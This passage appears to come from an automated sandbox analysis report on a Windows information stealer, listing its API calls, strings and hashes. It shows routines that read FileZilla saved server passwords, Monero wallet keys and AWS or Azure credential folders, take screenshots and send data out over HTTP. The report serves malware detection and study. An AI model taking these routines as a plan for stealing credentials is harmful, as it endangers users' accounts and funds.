                            • Opcode Fuzzy Hash: 12211658c1501451a36fb3799bd3132ba43d11b85cd5cfeb62d8cca329864380
                            • Instruction Fuzzy Hash: C1415AF3A487088BF304AE39DD85366BBD6DB94320F1A863DD794C3788ED7985058646
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bec8996bbee730d8eff4646034fff08019fa876f7fbaea3f01cb1fd28f70d1f4
                            • Instruction ID: b11152e45fa7583f6abb92451f028e57fccd3be34b957c4782deedf5e9737d09
                            • Opcode Fuzzy Hash: bec8996bbee730d8eff4646034fff08019fa876f7fbaea3f01cb1fd28f70d1f4
                            • Instruction Fuzzy Hash: 7F31E2B210C704EFE309BF19ECC5AAEFBE5FB58314F16492DE2D582650E735A4408A47
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                            • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                            • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                            • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                            APIs
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                              • Part of subcall function 00578DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00578E0B
                              • Part of subcall function 0057A920: lstrcpy.KERNEL32(00000000,?), ref: 0057A972
                              • Part of subcall function 0057A920: lstrcat.KERNEL32(00000000), ref: 0057A982
                              • Part of subcall function 0057A8A0: lstrcpy.KERNEL32(?,00580E17), ref: 0057A905
                              • Part of subcall function 0057A9B0: lstrlen.KERNEL32(?,00E48F88,?,\Monero\wallet.keys,00580E17), ref: 0057A9C5
                              • Part of subcall function 0057A9B0: lstrcpy.KERNEL32(00000000), ref: 0057AA04
                              • Part of subcall function 0057A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0057AA12
                              • Part of subcall function 0057A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0057A7E6
                              • Part of subcall function 005699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005699EC
                              • Part of subcall function 005699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00569A11
                              • Part of subcall function 005699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00569A31
                              • Part of subcall function 005699C0: ReadFile.KERNEL32(000000FF,?,00000000,0056148F,00000000), ref: 00569A5A
                              • Part of subcall function 005699C0: LocalFree.KERNEL32(0056148F), ref: 00569A90
                              • Part of subcall function 005699C0: CloseHandle.KERNEL32(000000FF), ref: 00569A9A
                              • Part of subcall function 00578E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00578E52
                            • GetProcessHeap.KERNEL32(00000000,000F423F,00580DBA,00580DB7,00580DB6,00580DB3), ref: 00570362
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00570369
                            • StrStrA.SHLWAPI(00000000,<Host>), ref: 00570385
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00580DB2), ref: 00570393
                            • StrStrA.SHLWAPI(00000000,<Port>), ref: 005703CF
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00580DB2), ref: 005703DD
                            • StrStrA.SHLWAPI(00000000,<User>), ref: 00570419
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00580DB2), ref: 00570427
                            • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00570463
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00580DB2), ref: 00570475
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00580DB2), ref: 00570502
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00580DB2), ref: 0057051A
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00580DB2), ref: 00570532
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00580DB2), ref: 0057054A
                            • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00570562
                            • lstrcat.KERNEL32(?,profile: null), ref: 00570571
                            • lstrcat.KERNEL32(?,url: ), ref: 00570580
                            • lstrcat.KERNEL32(?,00000000), ref: 00570593
                            • lstrcat.KERNEL32(?,00581678), ref: 005705A2
                            • lstrcat.KERNEL32(?,00000000), ref: 005705B5
                            • lstrcat.KERNEL32(?,0058167C), ref: 005705C4
                            • lstrcat.KERNEL32(?,login: ), ref: 005705D3
                            • lstrcat.KERNEL32(?,00000000), ref: 005705E6
                            • lstrcat.KERNEL32(?,00581688), ref: 005705F5
                            • lstrcat.KERNEL32(?,password: ), ref: 00570604
                            • lstrcat.KERNEL32(?,00000000), ref: 00570617
                            • lstrcat.KERNEL32(?,00581698), ref: 00570626
                            • lstrcat.KERNEL32(?,0058169C), ref: 00570635
                            • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00580DB2), ref: 0057068E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                            • API String ID: 1942843190-555421843
                            • Opcode ID: a5d78ccab7364ed9d60e58ea2653b4eda049c32a879ba5641e4611680dd572a3
                            • Instruction ID: 2e102ede5453785557d5f255ff6024bb075561927b3a60fe52e99d87f037808f
                            • Opcode Fuzzy Hash: a5d78ccab7364ed9d60e58ea2653b4eda049c32a879ba5641e4611680dd572a3
                            • Instruction Fuzzy Hash: E1D11E71900109ABCB04FBF4ED9ADEE7B78BF94300F40C418F506A6095EF74AA46DB66
                            APIs
                              • Part of subcall function 0057A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0057A7E6
                              • Part of subcall function 005647B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00564839
                              • Part of subcall function 005647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00564849
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 005659F8
                            • StrCmpCA.SHLWAPI(?,00E4EA18), ref: 00565A13
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00565B93
                            • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00E4E988,00000000,?,00E4A870,00000000,?,00581A1C), ref: 00565E71
                            • lstrlen.KERNEL32(00000000), ref: 00565E82
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00565E93
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00565E9A
                            • lstrlen.KERNEL32(00000000), ref: 00565EAF
                            • lstrlen.KERNEL32(00000000), ref: 00565ED8
                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00565EF1
                            • lstrlen.KERNEL32(00000000,?,?), ref: 00565F1B
                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00565F2F
                            • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00565F4C
                            • InternetCloseHandle.WININET(00000000), ref: 00565FB0
                            • InternetCloseHandle.WININET(00000000), ref: 00565FBD
                            • HttpOpenRequestA.WININET(00000000,00E4E9F8,?,00E4E188,00000000,00000000,00400100,00000000), ref: 00565BF8
                              • Part of subcall function 0057A9B0: lstrlen.KERNEL32(?,00E48F88,?,\Monero\wallet.keys,00580E17), ref: 0057A9C5
                              • Part of subcall function 0057A9B0: lstrcpy.KERNEL32(00000000), ref: 0057AA04
                              • Part of subcall function 0057A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0057AA12
                              • Part of subcall function 0057A8A0: lstrcpy.KERNEL32(?,00580E17), ref: 0057A905
                              • Part of subcall function 0057A920: lstrcpy.KERNEL32(00000000,?), ref: 0057A972
                              • Part of subcall function 0057A920: lstrcat.KERNEL32(00000000), ref: 0057A982
                            • InternetCloseHandle.WININET(00000000), ref: 00565FC7
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                            • String ID: "$"$------$------$------$
                            • API String ID: 874700897-1076418438
                            • Opcode ID: 6a40e92a1c38427e28cc5fe6cf07caf264ed2e6df08239c7754d7ff96c8a7c43
                            • Instruction ID: e0f6bfb4cb1ed32ce7b122f5578b7dba744a3cab1f7bd2a9d5b2865a46c47345
                            • Opcode Fuzzy Hash: 6a40e92a1c38427e28cc5fe6cf07caf264ed2e6df08239c7754d7ff96c8a7c43
                            • Instruction Fuzzy Hash: BF121172820119ABDB15EBA0EC99FEEB778BFD4700F408159F11A72091EF702A49DF56
                            APIs
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                              • Part of subcall function 0057A9B0: lstrlen.KERNEL32(?,00E48F88,?,\Monero\wallet.keys,00580E17), ref: 0057A9C5
                              • Part of subcall function 0057A9B0: lstrcpy.KERNEL32(00000000), ref: 0057AA04
                              • Part of subcall function 0057A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0057AA12
                              • Part of subcall function 0057A8A0: lstrcpy.KERNEL32(?,00580E17), ref: 0057A905
                              • Part of subcall function 00578B60: GetSystemTime.KERNEL32(00580E1A,00E4A930,005805AE,?,?,005613F9,?,0000001A,00580E1A,00000000,?,00E48F88,?,\Monero\wallet.keys,00580E17), ref: 00578B86
                              • Part of subcall function 0057A920: lstrcpy.KERNEL32(00000000,?), ref: 0057A972
                              • Part of subcall function 0057A920: lstrcat.KERNEL32(00000000), ref: 0057A982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0056CF83
                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0056D0C7
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0056D0CE
                            • lstrcat.KERNEL32(?,00000000), ref: 0056D208
                            • lstrcat.KERNEL32(?,00581478), ref: 0056D217
                            • lstrcat.KERNEL32(?,00000000), ref: 0056D22A
                            • lstrcat.KERNEL32(?,0058147C), ref: 0056D239
                            • lstrcat.KERNEL32(?,00000000), ref: 0056D24C
                            • lstrcat.KERNEL32(?,00581480), ref: 0056D25B
                            • lstrcat.KERNEL32(?,00000000), ref: 0056D26E
                            • lstrcat.KERNEL32(?,00581484), ref: 0056D27D
                            • lstrcat.KERNEL32(?,00000000), ref: 0056D290
                            • lstrcat.KERNEL32(?,00581488), ref: 0056D29F
                            • lstrcat.KERNEL32(?,00000000), ref: 0056D2B2
                            • lstrcat.KERNEL32(?,0058148C), ref: 0056D2C1
                            • lstrcat.KERNEL32(?,00000000), ref: 0056D2D4
                            • lstrcat.KERNEL32(?,00581490), ref: 0056D2E3
                              • Part of subcall function 0057A820: lstrlen.KERNEL32(00564F05,?,?,00564F05,00580DDE), ref: 0057A82B
                              • Part of subcall function 0057A820: lstrcpy.KERNEL32(00580DDE,00000000), ref: 0057A885
                            • lstrlen.KERNEL32(?), ref: 0056D32A
                            • lstrlen.KERNEL32(?), ref: 0056D339
                              • Part of subcall function 0057AA70: StrCmpCA.SHLWAPI(00E491F8,0056A7A7,?,0056A7A7,00E491F8), ref: 0057AA8F
                            • DeleteFileA.KERNEL32(00000000), ref: 0056D3B4
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                            • String ID:
                            • API String ID: 1956182324-0
                            • Opcode ID: 1668dca4c03477c6629b41e61d7cfae50dd0bf45b04513a710399d0b2099c82e
                            • Instruction ID: 4c37c01e677902afa10f40582528cd068a6244a4954d36651f66a4d47283c0c6
                            • Opcode Fuzzy Hash: 1668dca4c03477c6629b41e61d7cfae50dd0bf45b04513a710399d0b2099c82e
                            • Instruction Fuzzy Hash: A9E11171910109ABCB04EBA0ED9AEEE7B78BFD4301F108554F50AB7091DF39AA05DB66
                            APIs
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                              • Part of subcall function 0057A920: lstrcpy.KERNEL32(00000000,?), ref: 0057A972
                              • Part of subcall function 0057A920: lstrcat.KERNEL32(00000000), ref: 0057A982
                              • Part of subcall function 0057A8A0: lstrcpy.KERNEL32(?,00580E17), ref: 0057A905
                              • Part of subcall function 0057A9B0: lstrlen.KERNEL32(?,00E48F88,?,\Monero\wallet.keys,00580E17), ref: 0057A9C5
                              • Part of subcall function 0057A9B0: lstrcpy.KERNEL32(00000000), ref: 0057AA04
                              • Part of subcall function 0057A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0057AA12
                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00E4CE70,00000000,?,0058144C,00000000,?,?), ref: 0056CA6C
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0056CA89
                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0056CA95
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0056CAA8
                            • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0056CAD9
                            • StrStrA.SHLWAPI(?,00E4CF90,00580B52), ref: 0056CAF7
                            • StrStrA.SHLWAPI(00000000,00E4CEE8), ref: 0056CB1E
                            • StrStrA.SHLWAPI(?,00E4D660,00000000,?,00581458,00000000,?,00000000,00000000,?,00E49248,00000000,?,00581454,00000000,?), ref: 0056CCA2
                            • StrStrA.SHLWAPI(00000000,00E4D900), ref: 0056CCB9
                              • Part of subcall function 0056C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0056C871
                              • Part of subcall function 0056C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0056C87C
                            • StrStrA.SHLWAPI(?,00E4D900,00000000,?,0058145C,00000000,?,00000000,00E491B8), ref: 0056CD5A
                            • StrStrA.SHLWAPI(00000000,00E48FC8), ref: 0056CD71
                              • Part of subcall function 0056C820: lstrcat.KERNEL32(?,00580B46), ref: 0056C943
                              • Part of subcall function 0056C820: lstrcat.KERNEL32(?,00580B47), ref: 0056C957
                              • Part of subcall function 0056C820: lstrcat.KERNEL32(?,00580B4E), ref: 0056C978
                            • lstrlen.KERNEL32(00000000), ref: 0056CE44
                            • CloseHandle.KERNEL32(00000000), ref: 0056CE9C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                            • String ID:
                            • API String ID: 3744635739-3916222277
                            • Opcode ID: de872f1ef3693325eb4007a7c3452ed64bbe6a5c3110a0a64e2fdc75b52ae221
                            • Instruction ID: e96502901f52643d34dace79c5f280a7dee691c501a2a6a4be7951c29cb44a9a
                            • Opcode Fuzzy Hash: de872f1ef3693325eb4007a7c3452ed64bbe6a5c3110a0a64e2fdc75b52ae221
                            • Instruction Fuzzy Hash: 6AE12371800109ABDB15EBA4EC99FEEBB78BFD4300F008159F11A67191DF346A4ADF66
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID: @$H$`
                            • API String ID: 2001356338-3031705493
                            • Opcode ID: d4e73c2cc197b923a4943e6a795c086d277f80dc97b3c2104acb763f22d3cfb6
                            • Instruction ID: 5b76c140da8c597fafb6eb3ae2f33eabbb52e3034e8637feb6fac7eda88d7250
                            • Opcode Fuzzy Hash: d4e73c2cc197b923a4943e6a795c086d277f80dc97b3c2104acb763f22d3cfb6
                            • Instruction Fuzzy Hash: 92C182B5900119ABCB14EF60EC8DFEE7B78BBD4304F008598E50E67141EB74AA85DFA5
                            APIs
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                            • RegOpenKeyExA.ADVAPI32(00000000,00E4B188,00000000,00020019,00000000,005805B6), ref: 005783A4
                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00578426
                            • wsprintfA.USER32 ref: 00578459
                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0057847B
                            • RegCloseKey.ADVAPI32(00000000), ref: 0057848C
                            • RegCloseKey.ADVAPI32(00000000), ref: 00578499
                              • Part of subcall function 0057A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0057A7E6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenlstrcpy$Enumwsprintf
                            • String ID: - $%s\%s$?
                            • API String ID: 3246050789-3278919252
                            • Opcode ID: 33e97b89351ef061f255101b249737764a28662de02444d05a558262646f5a33
                            • Instruction ID: 682a4d17dcad65860f466161b0be5ba825546b5fa6563e721b9f8dd00cdbe864
                            • Opcode Fuzzy Hash: 33e97b89351ef061f255101b249737764a28662de02444d05a558262646f5a33
                            • Instruction Fuzzy Hash: B9813E71910118ABDB64DB64DC95FEE7BB8FF88700F00C698E109A6180DF746B89DFA5
                            APIs
                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0057906C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateGlobalStream
                            • String ID: 8$image/jpeg
                            • API String ID: 2244384528-1445462635
                            • Opcode ID: e695301b44803ceef6a5a2ceab7d9066e809449590a0c7dda7636411562f480f
                            • Instruction ID: 4eaac597cb900e9d5ac7967c90f0f5681b01a273be35286b20dddbeb0347bcde
                            • Opcode Fuzzy Hash: e695301b44803ceef6a5a2ceab7d9066e809449590a0c7dda7636411562f480f
                            • Instruction Fuzzy Hash: 4B71FF75910209ABDB04EFE4DC89FEEBBB9BF88700F148508F515A7290DB389905DF65
                            APIs
                              • Part of subcall function 00578DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00578E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 00574DB0
                            • lstrcat.KERNEL32(?,\.azure\), ref: 00574DCD
                              • Part of subcall function 00574910: wsprintfA.USER32 ref: 0057492C
                              • Part of subcall function 00574910: FindFirstFileA.KERNEL32(?,?), ref: 00574943
                            • lstrcat.KERNEL32(?,00000000), ref: 00574E3C
                            • lstrcat.KERNEL32(?,\.aws\), ref: 00574E59
                              • Part of subcall function 00574910: StrCmpCA.SHLWAPI(?,00580FDC), ref: 00574971
                              • Part of subcall function 00574910: StrCmpCA.SHLWAPI(?,00580FE0), ref: 00574987
                              • Part of subcall function 00574910: FindNextFileA.KERNEL32(000000FF,?), ref: 00574B7D
                              • Part of subcall function 00574910: FindClose.KERNEL32(000000FF), ref: 00574B92
                            • lstrcat.KERNEL32(?,00000000), ref: 00574EC8
                            • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00574EE5
                              • Part of subcall function 00574910: wsprintfA.USER32 ref: 005749B0
                              • Part of subcall function 00574910: StrCmpCA.SHLWAPI(?,005808D2), ref: 005749C5
                              • Part of subcall function 00574910: wsprintfA.USER32 ref: 005749E2
                              • Part of subcall function 00574910: PathMatchSpecA.SHLWAPI(?,?), ref: 00574A1E
                              • Part of subcall function 00574910: lstrcat.KERNEL32(?,00E4EA98), ref: 00574A4A
                              • Part of subcall function 00574910: lstrcat.KERNEL32(?,00580FF8), ref: 00574A5C
                              • Part of subcall function 00574910: lstrcat.KERNEL32(?,?), ref: 00574A70
                              • Part of subcall function 00574910: lstrcat.KERNEL32(?,00580FFC), ref: 00574A82
                              • Part of subcall function 00574910: lstrcat.KERNEL32(?,?), ref: 00574A96
                              • Part of subcall function 00574910: CopyFileA.KERNEL32(?,?,00000001), ref: 00574AAC
                              • Part of subcall function 00574910: DeleteFileA.KERNEL32(?), ref: 00574B31
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
